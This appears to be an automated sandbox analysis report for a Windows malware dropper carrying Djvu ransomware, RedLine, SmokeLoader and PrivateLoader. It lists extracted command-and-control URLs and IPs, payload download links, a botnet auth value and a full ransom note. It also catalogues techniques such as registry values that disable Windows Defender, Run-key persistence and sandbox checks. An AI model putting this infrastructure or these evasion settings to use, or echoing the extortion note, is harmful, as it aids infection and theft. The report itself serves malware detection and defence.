djvu | 81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5

Analysis

max time kernel
118s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
07-09-2022 11:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
Size

4.4MB
MD5

1550960dfdbc26af42d1f99c406bad91
SHA1

6c932a7374ed8550b0fdb09e31660d2b50345c4e
SHA256

81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5
SHA512

5c82fc908670cb92f03c86b67f2febc8a54a42580d726447a9622fc3e2a06459bade850686cb92932fea3a1d3240b93c440b52121ad4d914c32012e8ce1808dc
SSDEEP

98304:ADuU5pHTMY5akYvb4jmP2ifh8GiXLc/BCqfG:AV5FMMYvgi2M8/XLc5CqfG

Score

10^/10

djvu nymaim privateloader redline smokeloader 3108_ruzki backdoor discovery evasion infostealer loader main persistence ransomware spyware stealer themida trojan upx

Malware Config

Extracted

Family

privateloader

http://163.123.143.4/proxies.txt

http://107.182.129.251/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

163.123.143.12

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes

payload_url
https://vipsofts.xyz/files/mega.bmp

Extracted

Family

djvu

http://acacaca.org/test3/get.php

Attributes

extension
.mmvb
offline_id
yd6oYv6aBN90yFzTWdZ34sXSXtXiauzOLXZyWht1
payload_url
http://rgyui.top/dl/build2.exe
http://acacaca.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-xuPJqoyzQE Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0556Jhyjd

rsa_pubkey.plain

Extracted

Family

redline

Botnet

3108_RUZKI

213.219.247.199:9452

Attributes

auth_value
f71fed1cd094e4e1eb7ad1c53e542bca

Signatures

Detected Djvu ransomware 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1476-201-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1476-204-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1084-209-0x00000000049E0000-0x0000000004AFB000-memory.dmp	family_djvu
behavioral2/memory/1476-207-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1476-211-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1476-228-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4820-250-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4820-251-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4820-273-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4820-344-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Detects Smokeloader packer 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3128-208-0x0000000002BB0000-0x0000000002BB9000-memory.dmp	family_smokeloader
behavioral2/memory/2820-212-0x0000000000400000-0x0000000000409000-memory.dmp	family_smokeloader
behavioral2/memory/2820-200-0x0000000000400000-0x0000000000409000-memory.dmp	family_smokeloader
behavioral2/memory/1748-197-0x0000000002CC0000-0x0000000002CC9000-memory.dmp	family_smokeloader
behavioral2/memory/1340-346-0x0000000002CD0000-0x0000000002CD9000-memory.dmp	family_smokeloader

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

Adblock.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Adblock.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Adblock.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Adblock.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Adblock.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Adblock.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Adblock.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Adblock.exe

NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2920-331-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 1084 created 4592	1084	svchost.exe	8LGCVbQpmBGp3olFcvsyLfbQ.exe
PID 1084 created 3464	1084	svchost.exe	_YiRi8lyq5g4rX5QDwR_6XBC.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
Downloads MZ/PE file

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe

Executes dropped EXE 37 IoCs

Processes:

Lp2dbwbN2T8SL7q6CUPPNX_e.exe9X_l4OzNkIFcc_mhRCRPuCKg.exeste63gP8m0N_8sNN3Z5ET2Dq.exevisFT3lSO_8ZOfZv5P69I2QI.exeVSAys9Q8JaBCGDxuKx0c866l.exelUEr_IaF1m_MA_fMKs0cPWZL.exeHOac2Tsz9nY_mLeQOxIqTrPa.exeMj9vpMN6DJTj1V6POgsQAeAL.exelch9FZIjmxIojKvTXJL4TNoV.exe8LGCVbQpmBGp3olFcvsyLfbQ.exeVSAys9Q8JaBCGDxuKx0c866l.exeste63gP8m0N_8sNN3Z5ET2Dq.exeAdblock.exeste63gP8m0N_8sNN3Z5ET2Dq.exeste63gP8m0N_8sNN3Z5ET2Dq.exebuild2.execmd.exes1JfYaxANNVA0_YcroWxU1wQ.exeXtnimG3Crj_efkljVY9dM1RR.exe9OLjWNmPfO2KudW829SLtbA9.exe0s8i0CjbtViLP1DvDI49e0Pg.exeaAW5RTcxWabc6JRVyWMxrIED.exeJOXrBXkzEsjgupj8TsjrO7t_.exe_YiRi8lyq5g4rX5QDwR_6XBC.exeZVsabRcV014Hwu_ClU_pvRa3.exeIwCq2ybUDQKXfeqZoC4M3cwr.exe3z0raPKfhernw_IBr0j2szjl.tmpInstall.exeInstall.exe8LGCVbQpmBGp3olFcvsyLfbQ.execrashpad_handler.exe_YiRi8lyq5g4rX5QDwR_6XBC.exeVirtual.exe.pifbuild2.exeAdblockInstaller.exeAdblockInstaller.tmp

pid	process
3784	Lp2dbwbN2T8SL7q6CUPPNX_e.exe
4880	9X_l4OzNkIFcc_mhRCRPuCKg.exe
1084	ste63gP8m0N_8sNN3Z5ET2Dq.exe
3952	visFT3lSO_8ZOfZv5P69I2QI.exe
3128	VSAys9Q8JaBCGDxuKx0c866l.exe
4740	lUEr_IaF1m_MA_fMKs0cPWZL.exe
4492	HOac2Tsz9nY_mLeQOxIqTrPa.exe
3436	Mj9vpMN6DJTj1V6POgsQAeAL.exe
1748	lch9FZIjmxIojKvTXJL4TNoV.exe
4592	8LGCVbQpmBGp3olFcvsyLfbQ.exe
2820	VSAys9Q8JaBCGDxuKx0c866l.exe
1476	ste63gP8m0N_8sNN3Z5ET2Dq.exe
4148	Adblock.exe
2632	ste63gP8m0N_8sNN3Z5ET2Dq.exe
4820	ste63gP8m0N_8sNN3Z5ET2Dq.exe
4268	build2.exe
3160	cmd.exe
3928	s1JfYaxANNVA0_YcroWxU1wQ.exe
1340	XtnimG3Crj_efkljVY9dM1RR.exe
2440	9OLjWNmPfO2KudW829SLtbA9.exe
3880	0s8i0CjbtViLP1DvDI49e0Pg.exe
4172	aAW5RTcxWabc6JRVyWMxrIED.exe
4928	JOXrBXkzEsjgupj8TsjrO7t_.exe
3464	_YiRi8lyq5g4rX5QDwR_6XBC.exe
4392	ZVsabRcV014Hwu_ClU_pvRa3.exe
4744	IwCq2ybUDQKXfeqZoC4M3cwr.exe
368	3z0raPKfhernw_IBr0j2szjl.tmp
1468	Install.exe
3544	Install.exe
4148	Adblock.exe
4668	8LGCVbQpmBGp3olFcvsyLfbQ.exe
1852	crashpad_handler.exe
3436	_YiRi8lyq5g4rX5QDwR_6XBC.exe
1192	Virtual.exe.pif
4976	build2.exe
2128	AdblockInstaller.exe
3332	AdblockInstaller.tmp

Modifies Windows Firewall 1 TTPs 4 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

3636 netsh.exe
1740 netsh.exe
4396 netsh.exe
1336 netsh.exe

pid	process
3636	netsh.exe
1740	netsh.exe
4396	netsh.exe
1336	netsh.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\0s8i0CjbtViLP1DvDI49e0Pg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\0s8i0CjbtViLP1DvDI49e0Pg.exe	upx
behavioral2/memory/3880-320-0x0000000000A00000-0x0000000001CA1000-memory.dmp	upx
behavioral2/memory/3880-362-0x0000000000A00000-0x0000000001CA1000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ste63gP8m0N_8sNN3Z5ET2Dq.exes1JfYaxANNVA0_YcroWxU1wQ.exeAdblock.exe_YiRi8lyq5g4rX5QDwR_6XBC.exeInstall.exe81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe9X_l4OzNkIFcc_mhRCRPuCKg.exe3z0raPKfhernw_IBr0j2szjl.tmpvisFT3lSO_8ZOfZv5P69I2QI.exeste63gP8m0N_8sNN3Z5ET2Dq.exeIwCq2ybUDQKXfeqZoC4M3cwr.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	ste63gP8m0N_8sNN3Z5ET2Dq.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	s1JfYaxANNVA0_YcroWxU1wQ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Adblock.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	_YiRi8lyq5g4rX5QDwR_6XBC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	9X_l4OzNkIFcc_mhRCRPuCKg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	3z0raPKfhernw_IBr0j2szjl.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	visFT3lSO_8ZOfZv5P69I2QI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	ste63gP8m0N_8sNN3Z5ET2Dq.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	IwCq2ybUDQKXfeqZoC4M3cwr.exe

Drops startup file 1 IoCs

Processes:

Adblock.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk Adblock.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk	Adblock.exe

Loads dropped DLL 15 IoCs

Processes:

rundll32.exerundll32.exe3z0raPKfhernw_IBr0j2szjl.tmprundll32.exeAdblock.exerundll32.exeAdblockInstaller.tmpbuild2.exe

pid	process
4500	rundll32.exe
4296	rundll32.exe
368	3z0raPKfhernw_IBr0j2szjl.tmp
812	rundll32.exe
4148	Adblock.exe
4148	Adblock.exe
4148	Adblock.exe
4148	Adblock.exe
4960	rundll32.exe
4148	Adblock.exe
4148	Adblock.exe
3332	AdblockInstaller.tmp
4976	build2.exe
4976	build2.exe
4976	build2.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2988 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2988	icacls.exe

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/1584-132-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida
behavioral2/memory/1584-133-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida
behavioral2/memory/1584-134-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida
behavioral2/memory/1584-135-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida
behavioral2/memory/1584-136-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida
behavioral2/memory/1584-137-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida
behavioral2/memory/1584-138-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida
behavioral2/memory/1584-140-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida
behavioral2/memory/1584-141-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida
behavioral2/memory/1584-142-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida
behavioral2/memory/1584-177-0x0000000000A40000-0x00000000010C2000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

lUEr_IaF1m_MA_fMKs0cPWZL.exeste63gP8m0N_8sNN3Z5ET2Dq.exe9OLjWNmPfO2KudW829SLtbA9.exeJOXrBXkzEsjgupj8TsjrO7t_.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	lUEr_IaF1m_MA_fMKs0cPWZL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f0e4c476-5c6e-4ad7-9f77-470ecd363824\\ste63gP8m0N_8sNN3Z5ET2Dq.exe\" --AutoStart"	ste63gP8m0N_8sNN3Z5ET2Dq.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	9OLjWNmPfO2KudW829SLtbA9.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	9OLjWNmPfO2KudW829SLtbA9.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	JOXrBXkzEsjgupj8TsjrO7t_.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	JOXrBXkzEsjgupj8TsjrO7t_.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	lUEr_IaF1m_MA_fMKs0cPWZL.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe

Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

134 api.2ip.ua
148 ipinfo.io
186 api.2ip.ua
9 ipinfo.io
10 ipinfo.io
127 ipinfo.io
129 ipinfo.io
133 api.2ip.ua

flow	ioc
134	api.2ip.ua
148	ipinfo.io
186	api.2ip.ua
9	ipinfo.io
10	ipinfo.io
127	ipinfo.io
129	ipinfo.io
133	api.2ip.ua

Drops file in System32 directory 5 IoCs

Processes:

81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exeInstall.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe

pid process

1584 81a7727e76f90154c8b0ea0f71b643ec5bbe31f88b9936fbcb788a9fd7b2bbb5.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

VSAys9Q8JaBCGDxuKx0c866l.exesvchost.exeste63gP8m0N_8sNN3Z5ET2Dq.exeLp2dbwbN2T8SL7q6CUPPNX_e.exebuild2.exe

description	pid	process	target process
PID 3128 set thread context of 2820	3128	VSAys9Q8JaBCGDxuKx0c866l.exe	VSAys9Q8JaBCGDxuKx0c866l.exe
PID 1084 set thread context of 1476	1084	svchost.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 2632 set thread context of 4820	2632	ste63gP8m0N_8sNN3Z5ET2Dq.exe	ste63gP8m0N_8sNN3Z5ET2Dq.exe
PID 3784 set thread context of 2920	3784	Lp2dbwbN2T8SL7q6CUPPNX_e.exe	RegAsm.exe
PID 4268 set thread context of 4976	4268	build2.exe	build2.exe

Drops file in Program Files directory 2 IoCs

Processes:

visFT3lSO_8ZOfZv5P69I2QI.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	visFT3lSO_8ZOfZv5P69I2QI.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	visFT3lSO_8ZOfZv5P69I2QI.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

4492 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4492	sc.exe

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
528	3436	WerFault.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
4764	3436	WerFault.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
3016	3436	WerFault.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
616	3436	WerFault.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
1192	3436	WerFault.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
3840	3436	WerFault.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
4580	3436	WerFault.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
1180	3436	WerFault.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
4892	3436	WerFault.exe	Mj9vpMN6DJTj1V6POgsQAeAL.exe
4180	4744	WerFault.exe	IwCq2ybUDQKXfeqZoC4M3cwr.exe
4860	4744	WerFault.exe	IwCq2ybUDQKXfeqZoC4M3cwr.exe
4960	4744	WerFault.exe	IwCq2ybUDQKXfeqZoC4M3cwr.exe
5096	4744	WerFault.exe	IwCq2ybUDQKXfeqZoC4M3cwr.exe
3436	4744	WerFault.exe	IwCq2ybUDQKXfeqZoC4M3cwr.exe
3292	4744	WerFault.exe	IwCq2ybUDQKXfeqZoC4M3cwr.exe
2800	4744	WerFault.exe	IwCq2ybUDQKXfeqZoC4M3cwr.exe
2072	4744	WerFault.exe	IwCq2ybUDQKXfeqZoC4M3cwr.exe
1944	4744	WerFault.exe	IwCq2ybUDQKXfeqZoC4M3cwr.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

lch9FZIjmxIojKvTXJL4TNoV.exeXtnimG3Crj_efkljVY9dM1RR.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	lch9FZIjmxIojKvTXJL4TNoV.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	lch9FZIjmxIojKvTXJL4TNoV.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	XtnimG3Crj_efkljVY9dM1RR.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	XtnimG3Crj_efkljVY9dM1RR.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	XtnimG3Crj_efkljVY9dM1RR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	lch9FZIjmxIojKvTXJL4TNoV.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

build2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4624 schtasks.exe
4272 schtasks.exe
3556 schtasks.exe
2304 schtasks.exe
5032 schtasks.exe
664 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1624 timeout.exe
Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

4832 tasklist.exe
1620 tasklist.exe
1972 tasklist.exe
4396 tasklist.exe
4704 tasklist.exe
2664 tasklist.exe

pid	process
4624	schtasks.exe
4272	schtasks.exe
3556	schtasks.exe
2304	schtasks.exe
5032	schtasks.exe
664	schtasks.exe

pid	process
1624	timeout.exe

pid	process
4832	tasklist.exe
1620	tasklist.exe
1972	tasklist.exe
4396	tasklist.exe
4704	tasklist.exe
2664	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

4932 ipconfig.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4400 taskkill.exe
3376 taskkill.exe
2268 taskkill.exe
3172 taskkill.exe
2224 taskkill.exe

pid	process
4932	ipconfig.exe

pid	process
4400	taskkill.exe
3376	taskkill.exe
2268	taskkill.exe
3172	taskkill.exe
2224	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

8LGCVbQpmBGp3olFcvsyLfbQ.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	8LGCVbQpmBGp3olFcvsyLfbQ.exe
